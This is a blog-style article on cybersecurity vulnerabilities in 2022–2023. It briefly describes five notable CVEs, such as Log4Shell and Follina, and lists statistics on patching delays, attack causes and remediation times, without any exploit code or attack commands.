A vulnerability is a state of being exposed to the possibility of an attack. In the context of cyber security, vulnerabilities are software bugs that can expose your systems to threats like malware infection, DDoS attacks, injections, and ransomware attacks.
In this post, we will present the top 5 vulnerabilities, facts, and 30 important cyber security vulnerability statistics for 2023 in order to create a picture of the current cyber threat landscape across the globe.
Top 5 Cyber security vulnerability statistics in 2023
2022 saw its fair share of critical vulnerabilities and 2023 started with a critical vulnerability in Chromium-based browsers. Between Follina and Log4shell, a number of vulnerabilities put security administrators and business owners under serious concern. Let’s take a quick glance at some of the most widely recognized vulnerabilities from 2022 before we jump into the stats.
- Log4Shell (CVE-2021-44228)
A remote code execution vulnerability was found in the log4j logging library for Java applications in 2021. This allowed attackers to run arbitrary code on affected devices by sending a specially crafted HTTP request. This vulnerability endangered more than 3 billion devices.
2. Symlink following vulnerability in Chrome (CVE-2022-3656)
The publication of this vulnerability was quite recent. A lack of input validation in Chromium-based browsers allowed attackers to gain unauthorized access to data. This vulnerability endangered 2.5 billion Chrome users.
3. Microsoft Follina MSDT Bug (CVE-2022-30190)
This vulnerability allowed attackers to view, modify, and delete data without escalated privileges. It seriously endangers an organization’s data assets.
4. Spring4Shell (CVE-2022-22965)
Spring is an important open-source framework for Java applications. A remote code execution vulnerability was found in it which could affect all versions of Spring. Though the name might suggest otherwise, Spring4shell is not related to log4Shell.
5. Adobe Commerce RCE (CVE-2022-24086)
A critical vulnerability, affecting Adobe Commerce and Magento open-source software, was discovered in February 2022. It could lead to arbitrary code execution on vulnerable systems.
30 Important Cyber Security Vulnerability Statistics for 2023
Vulnerabilities and the Failure to Patch Them in Time
- In 2022 the National Vulnerability Database had 206059 entries.
- 8,051 vulnerabilities were listed in the first quarter of 2022 alone.
The National Vulnerability Database is a part of the US Department of Homeland Security. It is tasked with analyzing every CVE published on the CVE list. CVEs refer to Common Vulnerability Exposures. Whenever security researchers or organizations find new vulnerabilities, they add them to the CVE list maintained by MITRE Corporation. The vulnerability is assigned a CVE ID so that it is easy to identify and protect against the said vulnerability.
- 80% of exploits are published before the CVEs are released. The average gap between the publication of an exploit and the corresponding CVE is 23 days.
It means that after a specific vulnerability is discovered, the hackers get a head start before the security admins of an organization are even aware of the presence of the said vulnerability. In fact, the time lost between the publication of a patch and the deployment of the patch can also cause many problems for an organization.
- In 2021, 18% of all attacks were mounted through vulnerabilities that were listed in 2013 or earlier.
- 3 out of 4 attacks were launched through vulnerabilities that were exposed in or before 2017
- A study shows that 84% of companies have high-risk vulnerabilities half of which could be removed with a simple software update.
- 60% of data breaches are caused by the failure to apply available patches.
These statistics point to the fact that a strong security posture counts on the general security awareness of organizations both at a corporate level and a technical level. This shows a severe lack of vulnerability management and overall security posture management.
Detection and Severity of Vulnerabilities
- A 2020 report by the World Economic Forum recognized that the vulnerability detection rate in the US was as low as 0.05%.
- 43% of cyber attacks are aimed at small businesses whereas only 14% are prepared to defend themselves.
- Companies with less than 100 employees have the least amount of critical or high-severity vulnerabilities.
- Companies with more than 10000 employees have the most amount of critical severity vulnerabilities.
- 4.6% of vulnerabilities in web applications are critical while 4.4% have a high severity.
- The presence of critical vulnerabilities increases to 8% when it comes to applications that process payment card data.
This shows the importance of complying with PCI-DSS regulations for companies that process or store payment card information. Interestingly, you can tie the presence of vulnerabilities in an application to its age.
State of Security by Age of Organization
- According to a study by Veracode 80% of companies do not take new flaws in the first 1.5 years after the initial scan.
After this period of time, the number of vulnerabilities starts to climb. Vulnerabilities are fixed less often in older software.
- Almost 70% of applications contain at least one vulnerability after 5 years in production.
- 19% of software scanned in 2022 had high or critical severity vulnerabilities.
We have learned about the presence of vulnerabilities in web applications. It is time we learned about the different types of vulnerabilities.
What Caused the Attacks
- Of all cyber attacks 57% are attributed to Phishing and Social Engineering
- Compromised or stolen devices account for 33% of attacks
- Credential theft is responsible for 30% of attacks.
- Broken access control was ranked 1 on the OWASP top 10 list of vulnerabilities in 2021.
- It had an incidence rate of 3.81% with the 34 CWEs mapped to this issue occurring more often than any other vulnerability.
- Injection had an incidence rate of 3.37% and Security misconfigurations had an incidence rate of 4.5%.
- Study shows that Zero-day malware accounted for 66% of all threats in the last quarter of 2021.
Vulnerabilities in the Cloud
- In January 2020, security researchers discovered a critical vulnerability with a CVSS score of 10.0 in Microsoft Azure Infrastructure.
This discovery disproved the notion that cloud infrastructures are secure beyond reproach. Since then cloud security and cloud vulnerabilities have concerned stakeholders continuously.
- Since 2020, there has been a 205% increase in cloud security issues in the public sector.
Finding and identifying vulnerabilities is just one part of a cyber security endeavor. What takes a similar amount of effort is prioritizing the vulnerabilities and managing the process of remediation.
Prioritization & Remediation of Vulnerabilities
- 47% of DevSecOps professionals opine that the failure to prioritize vulnerabilities, i.e. which vulnerability to fix first, contributes greatly to vulnerability backlogs.
- An average of 130 hours per week is spent by teams to monitor and track threats.
- It takes more than 20 minutes of manual effort to detect, prioritize, and remediate one vulnerability.
The time required for remediation of a vulnerability differs greatly with industries. For instance,
- The MTTR (mean time to recovery) for Public Administrations was 92 days in 2022. Whereas it was 44 days for healthcare institutes.
- The average MTTR in 2022 was 57.5 days, a slight improvement from 60.3 days in 2021.
2022 was a year of interesting vulnerabilities like Log4Shell and Springshell that wreaked havoc. It was also a year that witness a steady redressal of poor cyber security standards following the pandemic.
We have seen vulnerabilities that were patched with rapidity as well as a vulnerability (CVE-1999-0517) that has been there since 1999. Overall it was a good year for anyone interested in the ebb and flow of the cybersecurity landscape. The cyber security vulnerability statistics are just a reflection of that motion.